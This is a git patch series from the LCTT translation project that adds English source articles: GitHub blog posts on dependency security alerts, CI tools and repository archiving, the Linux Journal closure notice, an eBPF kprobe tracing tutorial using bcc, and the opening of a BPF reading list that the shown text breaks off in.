+++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 sources/tech/20171116 Introducing security alerts on GitHub.md diff --git a/sources/tech/20171116 Introducing security alerts on GitHub.md b/sources/tech/20171116 Introducing security alerts on GitHub.md new file mode 100644 index 0000000000..0bfef7757d --- /dev/null +++ b/sources/tech/20171116 Introducing security alerts on GitHub.md @@ -0,0 +1,48 @@ +Introducing security alerts on GitHub +==================================== + + +Last month, we made it easier for you to keep track of the projects your code depends on with the dependency graph, currently supported in Javascript and Ruby. Today, for the over 75 percent of GitHub projects that have dependencies, we’re helping you do more than see those important projects. With your dependency graph enabled, we’ll now notify you when we detect a vulnerability in one of your dependencies and suggest known fixes from the GitHub community. + + [![Security Alerts & Suggested Fix](https://user-images.githubusercontent.com/594029/32851987-76c36e4a-c9eb-11e7-98fc-feb39fddaadb.gif)][1] + +### How to start using security alerts + +Whether your projects are private or public, security alerts get vital vulnerability information to the right people on your team. + +Enable your dependency graph + +Public repositories will automatically have your dependency graph and security alerts enabled. For private repositories, you’ll need to opt in to security alerts in your repository settings or by allowing access in the Dependency graph section of your repository’s Insights tab. + +Set notification preferences + +When your dependency graph is enabled, admins will receive security alerts by default. Admins can also add teams or individuals as recipients for security alerts in the dependency graph settings. + +Respond to alerts + +When we notify you about a potential vulnerability, we’ll highlight any dependencies that we recommend updating. If a known safe version exists, we’ll select one using machine learning and publicly available data, and include it in our suggestion. + +### Vulnerability coverage + +Vulnerabilities that have [CVE IDs][2] (publicly disclosed vulnerabilities from the [National Vulnerability Database][3]) will be included in security alerts. However, not all vulnerabilities have CVE IDs—even many publicly disclosed vulnerabilities don't have them. We'll continue to get better at identifying vulnerabilities as our security data grows. For more help managing security issues, check out our [security partners in the GitHub Marketplace][4]. + +This is the next step in using the world’s largest collection of open source data to help you keep code safer and do your best work. The dependency graph and security alerts currently support Javascript and Ruby—with Python support coming in 2018. + +[Learn more about security alerts][5] + +-------------------------------------------------------------------------------- + +via: https://github.com/blog/2470-introducing-security-alerts-on-github + +作者:[mijuhan ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://github.com/mijuhan +[1]:https://user-images.githubusercontent.com/594029/32851987-76c36e4a-c9eb-11e7-98fc-feb39fddaadb.gif +[2]:https://cve.mitre.org/ +[3]:https://nvd.nist.gov/ +[4]:https://github.com/marketplace/category/security +[5]:https://help.github.com/articles/about-security-alerts-for-vulnerable-dependencies/ From e4ae5272879d67d861874e4ca74ec0f80d5b1180 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 22:11:02 +0800 Subject: [PATCH 0203/1627] =?UTF-8?q?20171203-34=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20171107 GitHub welcomes all CI tools.md | 93 +++++++++++++++++++ 1 file changed, 93 insertions(+) create mode 100644 sources/tech/20171107 GitHub welcomes all CI tools.md diff --git a/sources/tech/20171107 GitHub welcomes all CI tools.md b/sources/tech/20171107 GitHub welcomes all CI tools.md new file mode 100644 index 0000000000..f3112d9481 --- /dev/null +++ b/sources/tech/20171107 GitHub welcomes all CI tools.md @@ -0,0 +1,93 @@ +GitHub welcomes all CI tools +==================== + + +[![GitHub and all CI tools](https://user-images.githubusercontent.com/29592817/32509084-2d52c56c-c3a1-11e7-8c49-901f0f601faf.png)][11] + +Continuous Integration ([CI][12]) tools help you stick to your team's quality standards by running tests every time you push a new commit and [reporting the results][13] to a pull request. Combined with continuous delivery ([CD][14]) tools, you can also test your code on multiple configurations, run additional performance tests, and automate every step [until production][15]. + +There are several CI and CD tools that [integrate with GitHub][16], some of which you can install in a few clicks from [GitHub Marketplace][17]. With so many options, you can pick the best tool for the job—even if it's not the one that comes pre-integrated with your system. + +The tools that will work best for you depends on many factors, including: + +* Programming language and application architecture + +* Operating system and browsers you plan to support + +* Your team's experience and skills + +* Scaling capabilities and plans for growth + +* Geographic distribution of dependent systems and the people who use them + +* Packaging and delivery goals + +Of course, it isn't possible to optimize your CI tool for all of these scenarios. The people who build them have to choose which use cases to serve best—and when to prioritize complexity over simplicity. For example, if you like to test small applications written in a particular programming language for one platform, you won't need the complexity of a tool that tests embedded software controllers on dozens of platforms with a broad mix of programming languages and frameworks. + +If you need a little inspiration for which CI tool might work best, take a look at [popular GitHub projects][18]. Many show the status of their integrated CI/CD tools as badges in their README.md. We've also analyzed the use of CI tools across more than 50 million repositories in the GitHub community, and found a lot of variety. The following diagram shows the relative percentage of the top 10 CI tools used with GitHub.com, based on the most used [commit status contexts][19] used within our pull requests. + + _Our analysis also showed that many teams use more than one CI tool in their projects, allowing them to emphasize what each tool does best._ + + [![Top 10 CI systems used with GitHub.com based on most used commit status contexts](https://user-images.githubusercontent.com/7321362/32575895-ea563032-c49a-11e7-9581-e05ec882658b.png)][20] + +If you'd like to check them out, here are the top 10 tools teams use: + +* [Travis CI][1] + +* [Circle CI][2] + +* [Jenkins][3] + +* [AppVeyor][4] + +* [CodeShip][5] + +* [Drone][6] + +* [Semaphore CI][7] + +* [Buildkite][8] + +* [Wercker][9] + +* [TeamCity][10] + +It's tempting to just pick the default, pre-integrated tool without taking the time to research and choose the best one for the job, but there are plenty of [excellent choices][21] built for your specific use cases. And if you change your mind later, no problem. When you choose the best tool for a specific situation, you're guaranteeing tailored performance and the freedom of interchangability when it no longer fits. + +Ready to see how CI tools can fit into your workflow? + +[Browse GitHub Marketplace][22] + +-------------------------------------------------------------------------------- + +via: https://github.com/blog/2463-github-welcomes-all-ci-tools + +作者:[jonico ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://github.com/jonico +[1]:https://travis-ci.org/ +[2]:https://circleci.com/ +[3]:https://jenkins.io/ +[4]:https://www.appveyor.com/ +[5]:https://codeship.com/ +[6]:http://try.drone.io/ +[7]:https://semaphoreci.com/ +[8]:https://buildkite.com/ +[9]:http://www.wercker.com/ +[10]:https://www.jetbrains.com/teamcity/ +[11]:https://user-images.githubusercontent.com/29592817/32509084-2d52c56c-c3a1-11e7-8c49-901f0f601faf.png +[12]:https://en.wikipedia.org/wiki/Continuous_integration +[13]:https://github.com/blog/2051-protected-branches-and-required-status-checks +[14]:https://en.wikipedia.org/wiki/Continuous_delivery +[15]:https://developer.github.com/changes/2014-01-09-preview-the-new-deployments-api/ +[16]:https://github.com/works-with/category/continuous-integration +[17]:https://github.com/marketplace/category/continuous-integration +[18]:https://github.com/explore?trending=repositories#trending +[19]:https://developer.github.com/v3/repos/statuses/ +[20]:https://user-images.githubusercontent.com/7321362/32575895-ea563032-c49a-11e7-9581-e05ec882658b.png +[21]:https://github.com/works-with/category/continuous-integration +[22]:https://github.com/marketplace/category/continuous-integration From 23624193afc75ecf7f0a9f15967d4c8f953fe23b Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 22:12:10 +0800 Subject: [PATCH 0204/1627] =?UTF-8?q?20171203-35=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../tech/20171108 Archiving repositories.md | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 sources/tech/20171108 Archiving repositories.md diff --git a/sources/tech/20171108 Archiving repositories.md b/sources/tech/20171108 Archiving repositories.md new file mode 100644 index 0000000000..3537254131 --- /dev/null +++ b/sources/tech/20171108 Archiving repositories.md @@ -0,0 +1,37 @@ +Archiving repositories +==================== + + +Just because a repository isn't actively developed anymore and you don't want to accept additional contributions doesn't mean you want to delete it. Now archive repositories on GitHub to make them read-only. + + [![archived repository banner](https://user-images.githubusercontent.com/7321362/32558403-450458dc-c46a-11e7-96f9-af31d2206acb.png)][1] + +Archiving a repository makes it read-only to everyone (including repository owners). This includes editing the repository, issues, pull requests, labels, milestones, projects, wiki, releases, commits, tags, branches, reactions and comments. No one can create new issues, pull requests, or comments on an archived repository, but you can still fork archived repositories—allowing development to continue elsewhere for archived open source projects. + +To archive a repository, go to your Repository Settings Page and click Archive this repository. + + [![archive repository button](https://user-images.githubusercontent.com/125011/32273119-0fc5571e-bef9-11e7-9909-d137268a1d6d.png)][2] + +Before archiving your repository, make sure you've changed its settings and consider closing all open issues and pull requests. You should also update your README and description to make it clear to visitors that it's no longer possible to contribute. + +If you change your mind and want to unarchive your repository, click Unarchive this repositoryin the same place. Please note that most archived repository settings are hidden and you'll have to unarchive the repository to change them. + + [![archived labelled repository](https://user-images.githubusercontent.com/125011/32541128-9d67a064-c466-11e7-857e-3834054ba3c9.png)][3] + +To learn more, check out [the documentation][4] on archiving repositories. Happy archiving! + +-------------------------------------------------------------------------------- + +via: https://github.com/blog/2460-archiving-repositories + +作者:[MikeMcQuaid ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://github.com/MikeMcQuaid +[1]:https://user-images.githubusercontent.com/7321362/32558403-450458dc-c46a-11e7-96f9-af31d2206acb.png +[2]:https://user-images.githubusercontent.com/125011/32273119-0fc5571e-bef9-11e7-9909-d137268a1d6d.png +[3]:https://user-images.githubusercontent.com/125011/32541128-9d67a064-c466-11e7-857e-3834054ba3c9.png +[4]:https://help.github.com/articles/about-archiving-repositories/ From 0db2613e0e3d6a6391cf131d365467f5b6b0d325 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 22:15:04 +0800 Subject: [PATCH 0205/1627] =?UTF-8?q?20171203-36=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...171201 Linux Journal Ceases Publication.md | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 sources/tech/20171201 Linux Journal Ceases Publication.md diff --git a/sources/tech/20171201 Linux Journal Ceases Publication.md b/sources/tech/20171201 Linux Journal Ceases Publication.md new file mode 100644 index 0000000000..0bb9b3a77b --- /dev/null +++ b/sources/tech/20171201 Linux Journal Ceases Publication.md @@ -0,0 +1,34 @@ +Linux Journal Ceases Publication +============================================================ + +EOF + +It looks like we’re at the end, folks. If all goes according to a plan we’d rather not have, the November issue of Linux Journal was our last. + +The simple fact is that we’ve run out of money, and options along with it. We never had a wealthy corporate parent or deep pockets of our own, and that made us an anomaly among publishers, from start to finish. While we got to be good at flying close to the ground for a long time, we lost what little elevation we had in November, when the scale finally tipped irrevocably to the negative. + +While we see a future like publishing’s past—a time when advertisers sponsor a publication because they value its brand and readers—the advertising world we have today would rather chase eyeballs, preferably by planting tracking beacons in readers' browsers and zapping them with ads anywhere those readers show up. But that future isn’t here, and the past is long gone. + +There is some hope, we suppose, that a savior might come through; but it will have to be one willing to pick up some of our debt, in addition to our brand, our archive, our domains and our subscribers and readers. If you know anyone who can make a serious offer, let us know. Otherwise, watch LinuxJournal.com and hope that at least our legacy archives (which go back to Linux Journal’s birth in April 1994, when Linux hit 1.0) won’t go away. There’s a lot of great stuff here, and a lot of history we’d hate the world to lose. + +Our biggest regret is that we don’t even have enough money to return to the people who have valued us most: our subscribers. For that we could not apologize more deeply or sincerely. What we do have for subscribers: + +Linux Pro Magazine has offered our subscribers six free issues of their magazine, a publication we at Linux Journal have always admired. In our time of need, they were the first ones there for us, and we are thankful for their gracious offer. We also just finished up our 2017 archive today, which includes every issue we’ve ever published, including the first and last ones. Normally we sell that for $25, but obviously subscribers will get it for no cost. Subscribers, watch for an e-mail with details about both. + +We also hope there is some solace in knowing that we worked very, very hard at keeping Linux Journal going, and we’ve been doing that for a long time, running the leanest, smallest possible operation we could. We are a collection mostly of volunteers, and some of our employees haven’t been paid in months. We still owe money to freelancers as well. There is a limit to how long a publisher can maintain those neglects, and that limit has now been reached. + +It has been a great run, folks. A big hats-off to everyone who contributed to our birth, our success and our persistence over these many years. We’d run the credits now, but the list would be too long, and the risk of leaving worthy people out would be too high. You know who you are. Our thanks again. + +-------------------------------------------------------------------------------- + +via: https://www.linuxjournal.com/content/linux-journal-ceases-publication + +作者:[ Carlie Fairchild][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxjournal.com/users/carlie-fairchild +[1]:https://www.linuxjournal.com/taxonomy/term/29 +[2]:https://www.linuxjournal.com/users/carlie-fairchild From ee49f88702cc478cf892476ce8594ff7fab5c515 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 22:17:24 +0800 Subject: [PATCH 0206/1627] =?UTF-8?q?20171203-37=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...an event Introducing eBPF Kernel probes.md | 361 ++++++++++++++++++ 1 file changed, 361 insertions(+) create mode 100644 sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md diff --git a/sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md b/sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md new file mode 100644 index 0000000000..a53270f2d7 --- /dev/null +++ b/sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md @@ -0,0 +1,361 @@ +How to turn any syscall into an event: Introducing eBPF Kernel probes +============================================================ + + +TL;DR: Using eBPF in recent (>=4.4) Linux kernel, you can turn any kernel function call into a user land event with arbitrary data. This is made easy by bcc. The probe is written in C while the data is handled by python. + +If you are not familiar with eBPF or linux tracing, you really should read the full post. It tries to progressively go through the pitfalls I stumbled unpon while playing around with bcc / eBPF while saving you a lot of the time I spent searching and digging. + +### A note on push vs pull in a Linux world + +When I started to work on containers, I was wondering how we could update a load balancer configuration dynamically based on actual system state. A common strategy, which works, it to let the container orchestrator trigger a load balancer configuration update whenever it starts a container and then let the load balancer poll the container until some health check passes. It may be a simple “SYN” test. + +While this configuration works, it has the downside of making your load balancer waiting for some system to be available while it should be… load balancing. + +Can we do better? + +When you want a program to react to some change in a system there are 2 possible strategies. The program may  _poll_  the system to detect changes or, if the system supports it, the system may  _push_ events and let the program react to them. Wether you want to use push or poll depends on the context. A good rule of the thumb is to use push events when the event rate is low with respect to the processing time and switch to polling when the events are coming fast or the system may become unusable. For example, typical network driver will wait for events from the network card while frameworks like dpdk will actively poll the card for events to achieve the highest throughput and lowest latency. + +In an ideal world, we’d have some kernel interface telling us: + +> * “Hey Mr. ContainerManager, I’ve just created a socket for the Nginx-ware of container  _servestaticfiles_ , maybe you want to update your state?” +> +> * “Sure Mr. OS, Thanks for letting me know” + +While Linux has a wide range of interfaces to deal with events, up to 3 for file events, there is no dedicated interface to get socket event notifications. You can get routing table events, neighbor table events, conntrack events, interface change events. Just, not socket events. Or maybe there is, deep hidden in a Netlink interface. + +Ideally, we’d need a generic way to do it. How? + +### Kernel tracing and eBPF, a bit of history + +Until recently the only way was to patch the kernel or resort on SystemTap. [SytemTap][5] is a tracing Linux system. In a nutshell, it provides a DSL which is then compiled into a kernel module which is then live-loaded into the running kernel. Except that some production system disable dynamic module loading for security reasons. Including the one I was working on at that time. The other way would be to patch the kernel to trigger some events, probably based on netlink. This is not really convenient. Kernel hacking come with downsides including “interesting” new “features” and increased maintenance burden. + +Hopefully, starting with Linux 3.15 the ground was laid to safely transform any traceable kernel function into userland events. “Safely” is common computer science expression referring to “some virtual machine”. This case is no exception. Linux has had one for years. Since Linux 2.1.75 released in 1997 actually. It’s called Berkeley Packet Filter of BPF for short. As its name suggests, it was originally developed for the BSD firewalls. It had only 2 registers and only allowed forward jumps meaning that you could not write loops with it (Well, you can, if you know the maximum iterations and you manually unroll them). The point was to guarantee the program would always terminate and hence never hang the system. Still not sure if it has any use while you have iptables? It serves as the [foundation of CloudFlare’s AntiDDos protection][6]. + +OK, so, with Linux the 3.15, [BPF was extended][7] turning it into eBPF. For “extended” BPF. It upgrades from 2 32 bits registers to 10 64 bits 64 registers and adds backward jumping among others. It has then been [further extended in Linux 3.18][8] moving it out of the networking subsystem, and adding tools like maps. To preserve the safety guarantees, it [introduces a checker][9] which validates all memory accesses and possible code path. If the checker can’t guarantee the code will terminate within fixed boundaries, it will deny the initial insertion of the program. + +For more history, there is [an excellent Oracle presentation on eBPF][10]. + +Let’s get started. + +### Hello from from `inet_listen` + +As writing assembly is not the most convenient task, even for the best of us, we’ll use [bcc][11]. bcc is a collection of tools based on LLVM and Python abstracting the underlying machinery. Probes are written in C and the results can be exploited from python allowing to easily write non trivial applications. + +Start by install bcc. For some of these examples, you may require a recent (read >= 4.4) version of the kernel. If you are willing to actually try these examples, I highly recommend that you setup a VM.  _NOT_  a docker container. You can’t change the kernel in a container. As this is a young and dynamic projects, install instructions are highly platform/version dependant. You can find up to date instructions on [https://github.com/iovisor/bcc/blob/master/INSTALL.md][12] + +So, we want to get an event whenever a program starts to listen on TCP socket. When calling the `listen()` syscall on a `AF_INET` + `SOCK_STREAM` socket, the underlying kernel function is [`inet_listen`][13]. We’ll start by hooking a “Hello World” `kprobe` on it’s entrypoint. + +``` +from bcc import BPF + +# Hello BPF Program +bpf_text = """ +#include +#include + +// 1\. Attach kprobe to "inet_listen" +int kprobe__inet_listen(struct pt_regs *ctx, struct socket *sock, int backlog) +{ + bpf_trace_printk("Hello World!\\n"); + return 0; +}; +""" + +# 2\. Build and Inject program +b = BPF(text=bpf_text) + +# 3\. Print debug output +while True: + print b.trace_readline() + +``` + +This program does 3 things: 1\. It attaches a kernel probe to “inet_listen” using a naming convention. If the function was called, say, “my_probe”, it could be explicitly attached with `b.attach_kprobe("inet_listen", "my_probe"`. 2\. It builds the program using LLVM new BPF backend, inject the resulting bytecode using the (new) `bpf()` syscall and automatically attaches the probes matching the naming convention. 3\. It reads the raw output from the kernel pipe. + +Note: eBPF backend of LLVM is still young. If you think you’ve hit a bug, you may want to upgrade. + +Noticed the `bpf_trace_printk` call? This is a stripped down version of the kernel’s `printk()`debug function. When used, it produces tracing informations to a special kernel pipe in `/sys/kernel/debug/tracing/trace_pipe`. As the name implies, this is a pipe. If multiple readers are consuming it, only 1 will get a given line. This makes it unsuitable for production. + +Fortunately, Linux 3.19 introduced maps for message passing and Linux 4.4 brings arbitrary perf events support. I’ll demo the perf event based approach later in this post. + +``` +# From a first console +ubuntu@bcc:~/dev/listen-evts$ sudo /python tcv4listen.py + nc-4940 [000] d... 22666.991714: : Hello World! + +# From a second console +ubuntu@bcc:~$ nc -l 0 4242 +^C + +``` + +Yay! + +### Grab the backlog + +Now, let’s print some easily accessible data. Say the “backlog”. The backlog is the number of pending established TCP connections, pending to be `accept()`ed. + +Just tweak a bit the `bpf_trace_printk`: + +``` +bpf_trace_printk("Listening with with up to %d pending connections!\\n", backlog); + +``` + +If you re-run the example with this world-changing improvement, you should see something like: + +``` +(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py + nc-5020 [000] d... 25497.154070: : Listening with with up to 1 pending connections! + +``` + +`nc` is a single connection program, hence the backlog of 1\. Nginx or Redis would output 128 here. But that’s another story. + +Easy hue? Now let’s get the port. + +### Grab the port and IP + +Studying `inet_listen` source from the kernel, we know that we need to get the `inet_sock` from the `socket` object. Just copy from the sources, and insert at the beginning of the tracer: + +``` +// cast types. Intermediate cast not needed, kept for readability +struct sock *sk = sock->sk; +struct inet_sock *inet = inet_sk(sk); + +``` + +The port can now be accessed from `inet->inet_sport` in network byte order (aka: Big Endian). Easy! So, we could just replace the `bpf_trace_printk` with: + +``` +bpf_trace_printk("Listening on port %d!\\n", inet->inet_sport); + +``` + +Then run: + +``` +ubuntu@bcc:~/dev/listen-evts$ sudo /python tcv4listen.py +... +R1 invalid mem access 'inv' +... +Exception: Failed to load BPF program kprobe__inet_listen + +``` + +Except that it’s not (yet) so simple. Bcc is improving a  _lot_  currently. While writing this post, a couple of pitfalls had already been addressed. But not yet all. This Error means the in-kernel checker could prove the memory accesses in program are correct. See the explicit cast. We need to help is a little by making the accesses more explicit. We’ll use `bpf_probe_read` trusted function to read an arbitrary memory location while guaranteeing all necessary checks are done with something like: + +``` +// Explicit initialization. The "=0" part is needed to "give life" to the variable on the stack +u16 lport = 0; + +// Explicit arbitrary memory access. Read it: +// Read into 'lport', 'sizeof(lport)' bytes from 'inet->inet_sport' memory location +bpf_probe_read(&lport, sizeof(lport), &(inet->inet_sport)); + +``` + +Reading the bound address for IPv4 is basically the same, using `inet->inet_rcv_saddr`. If we put is all together, we should get the backlog, the port and the bound IP: + +``` +from bcc import BPF + +# BPF Program +bpf_text = """ +#include +#include +#include + +// Send an event for each IPv4 listen with PID, bound address and port +int kprobe__inet_listen(struct pt_regs *ctx, struct socket *sock, int backlog) +{ + // Cast types. Intermediate cast not needed, kept for readability + struct sock *sk = sock->sk; + struct inet_sock *inet = inet_sk(sk); + + // Working values. You *need* to initialize them to give them "life" on the stack and use them afterward + u32 laddr = 0; + u16 lport = 0; + + // Pull in details. As 'inet_sk' is internally a type cast, we need to use 'bpf_probe_read' + // read: load into 'laddr' 'sizeof(laddr)' bytes from address 'inet->inet_rcv_saddr' + bpf_probe_read(&laddr, sizeof(laddr), &(inet->inet_rcv_saddr)); + bpf_probe_read(&lport, sizeof(lport), &(inet->inet_sport)); + + // Push event + bpf_trace_printk("Listening on %x %d with %d pending connections\\n", ntohl(laddr), ntohs(lport), backlog); + return 0; +}; +""" + +# Build and Inject BPF +b = BPF(text=bpf_text) + +# Print debug output +while True: + print b.trace_readline() + +``` + +A test run should output something like: + +``` +(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py + nc-5024 [000] d... 25821.166286: : Listening on 7f000001 4242 with 1 pending connections + +``` + +Provided that you listen on localhost. The address is displayed as hex here to avoid dealing with the IP pretty printing but that’s all wired. And that’s cool. + +Note: you may wonder why `ntohs` and `ntohl` can be called from BPF while they are not trusted. This is because they are macros and inline functions from “.h” files and a small bug was [fixed][14]while writing this post. + +All done, one more piece: We want to get the related container. In the context of networking, that’s means we want the network namespace. The network namespace being the building block of containers allowing them to have isolated networks. + +### Grab the network namespace: a forced introduction to perf events + +On the userland, the network namespace can be determined by checking the target of `/proc/PID/ns/net`. It should look like `net:[4026531957]`. The number between brackets is the inode number of the network namespace. This said, we could grab it by scrapping ‘/proc’ but this is racy, we may be dealing with short-lived processes. And races are never good. We’ll grab the inode number directly from the kernel. Fortunately, that’s an easy one: + +``` +// Create an populate the variable +u32 netns = 0; + +// Read the netns inode number, like /proc does +netns = sk->__sk_common.skc_net.net->ns.inum; + +``` + +Easy. And it works. + +But if you’ve read so far, you may guess there is something wrong somewhere. And there is: + +``` +bpf_trace_printk("Listening on %x %d with %d pending connections in container %d\\n", ntohl(laddr), ntohs(lport), backlog, netns); + +``` + +If you try to run it, you’ll get some cryptic error message: + +``` +(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py +error: in function kprobe__inet_listen i32 (%struct.pt_regs*, %struct.socket*, i32) +too many args to 0x1ba9108: i64 = Constant<6> + +``` + +What clang is trying to tell you is “Hey pal, `bpf_trace_printk` can only take 4 arguments, you’ve just used 5.“. I won’t dive into the details here, but that’s a BPF limitation. If you want to dig it, [here is a good starting point][15]. + +The only way to fix it is to… stop debugging and make it production ready. So let’s get started (and make sure run at least Linux 4.4). We’ll use perf events which supports passing arbitrary sized structures to userland. Additionally, only our reader will get it so that multiple unrelated eBPF programs can produce data concurrently without issues. + +To use it, we need to: + +1. define a structure + +2. declare the event + +3. push the event + +4. re-declare the event on Python’s side (This step should go away in the future) + +5. consume and format the event + +This may seem like a lot, but it ain’t. See: + +``` +// At the begining of the C program, declare our event +struct listen_evt_t { + u64 laddr; + u64 lport; + u64 netns; + u64 backlog; +}; +BPF_PERF_OUTPUT(listen_evt); + +// In kprobe__inet_listen, replace the printk with +struct listen_evt_t evt = { + .laddr = ntohl(laddr), + .lport = ntohs(lport), + .netns = netns, + .backlog = backlog, +}; +listen_evt.perf_submit(ctx, &evt, sizeof(evt)); + +``` + +Python side will require a little more work, though: + +``` +# We need ctypes to parse the event structure +import ctypes + +# Declare data format +class ListenEvt(ctypes.Structure): + _fields_ = [ + ("laddr", ctypes.c_ulonglong), + ("lport", ctypes.c_ulonglong), + ("netns", ctypes.c_ulonglong), + ("backlog", ctypes.c_ulonglong), + ] + +# Declare event printer +def print_event(cpu, data, size): + event = ctypes.cast(data, ctypes.POINTER(ListenEvt)).contents + print("Listening on %x %d with %d pending connections in container %d" % ( + event.laddr, + event.lport, + event.backlog, + event.netns, + )) + +# Replace the event loop +b["listen_evt"].open_perf_buffer(print_event) +while True: + b.kprobe_poll() + +``` + +Give it a try. In this example, I have a redis running in a docker container and nc on the host: + +``` +(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py +Listening on 0 6379 with 128 pending connections in container 4026532165 +Listening on 0 6379 with 128 pending connections in container 4026532165 +Listening on 7f000001 6588 with 1 pending connections in container 4026531957 + +``` + +### Last word + +Absolutely everything is now setup to use trigger events from arbitrary function calls in the kernel using eBPF, and you should have seen most of the common pitfalls I hit while learning eBPF. If you want to see the full version of this tool, along with some more tricks like IPv6 support, have a look at [https://github.com/iovisor/bcc/blob/master/tools/solisten.py][16]. It’s now an official tool, thanks to the support of the bcc team. + +To go further, you may want to checkout Brendan Gregg’s blog, in particular [the post about eBPF maps and statistics][17]. He his one of the project’s main contributor. + + +-------------------------------------------------------------------------------- + +via: https://blog.yadutaf.fr/2016/03/30/turn-any-syscall-into-event-introducing-ebpf-kernel-probes/ + +作者:[Jean-Tiare Le Bigot ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://blog.yadutaf.fr/about +[1]:https://blog.yadutaf.fr/tags/linux +[2]:https://blog.yadutaf.fr/tags/tracing +[3]:https://blog.yadutaf.fr/tags/ebpf +[4]:https://blog.yadutaf.fr/tags/bcc +[5]:https://en.wikipedia.org/wiki/SystemTap +[6]:https://blog.cloudflare.com/bpf-the-forgotten-bytecode/ +[7]:https://blog.yadutaf.fr/2016/03/30/turn-any-syscall-into-event-introducing-ebpf-kernel-probes/TODO +[8]:https://lwn.net/Articles/604043/ +[9]:http://lxr.free-electrons.com/source/kernel/bpf/verifier.c#L21 +[10]:http://events.linuxfoundation.org/sites/events/files/slides/tracing-linux-ezannoni-linuxcon-ja-2015_0.pdf +[11]:https://github.com/iovisor/bcc +[12]:https://github.com/iovisor/bcc/blob/master/INSTALL.md +[13]:http://lxr.free-electrons.com/source/net/ipv4/af_inet.c#L194 +[14]:https://github.com/iovisor/bcc/pull/453 +[15]:http://lxr.free-electrons.com/source/kernel/trace/bpf_trace.c#L86 +[16]:https://github.com/iovisor/bcc/blob/master/tools/solisten.py +[17]:http://www.brendangregg.com/blog/2015-05-15/ebpf-one-small-step.html From 3885eb51ecc1a01a8462f1175d52ff47415fba3d Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 22:20:28 +0800 Subject: [PATCH 0207/1627] =?UTF-8?q?20171203-38=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ive into BPF a list of reading material.md | 711 ++++++++++++++++++ 1 file changed, 711 insertions(+) create mode 100644 sources/tech/20171102 Dive into BPF a list of reading material.md diff --git a/sources/tech/20171102 Dive into BPF a list of reading material.md b/sources/tech/20171102 Dive into BPF a list of reading material.md new file mode 100644 index 0000000000..f4b90bd09d --- /dev/null +++ b/sources/tech/20171102 Dive into BPF a list of reading material.md @@ -0,0 +1,711 @@ +Dive into BPF: a list of reading material +============================================================ + +* [What is BPF?][143] + +* [Dive into the bytecode][144] + +* [Resources][145] + * [Generic presentations][23] + * [About BPF][1] + + * [About XDP][2] + + * [About other components related or based on eBPF][3] + + * [Documentation][24] + * [About BPF][4] + + * [About tc][5] + + * [About XDP][6] + + * [About P4 and BPF][7] + + * [Tutorials][25] + + * [Examples][26] + * [From the kernel][8] + + * [From package iproute2][9] + + * [From bcc set of tools][10] + + * [Manual pages][11] + + * [The code][27] + * [BPF code in the kernel][12] + + * [XDP hooks code][13] + + * [BPF logic in bcc][14] + + * [Code to manage BPF with tc][15] + + * [BPF utilities][16] + + * [Other interesting chunks][17] + + * [LLVM backend][18] + + * [Running in userspace][19] + + * [Commit logs][20] + + * [Troubleshooting][28] + * [Errors at compilation time][21] + + * [Errors at load and run time][22] + + * [And still more!][29] + + _~ [Updated][146] 2017-11-02 ~_ + +# What is BPF? + +BPF, as in **B**erkeley **P**acket **F**ilter, was initially conceived in 1992 so as to provide a way to filter packets and to avoid useless packet copies from kernel to userspace. It initially consisted in a simple bytecode that is injected from userspace into the kernel, where it is checked by a verifier—to prevent kernel crashes or security issues—and attached to a socket, then run on each received packet. It was ported to Linux a couple of years later, and used for a small number of applications (tcpdump for example). The simplicity of the language as well as the existence of an in-kernel Just-In-Time (JIT) compiling machine for BPF were factors for the excellent performances of this tool. + +Then in 2013, Alexei Starovoitov completely reshaped it, started to add new functionalities and to improve the performances of BPF. This new version is designated as eBPF (for “extended BPF”), while the former becomes cBPF 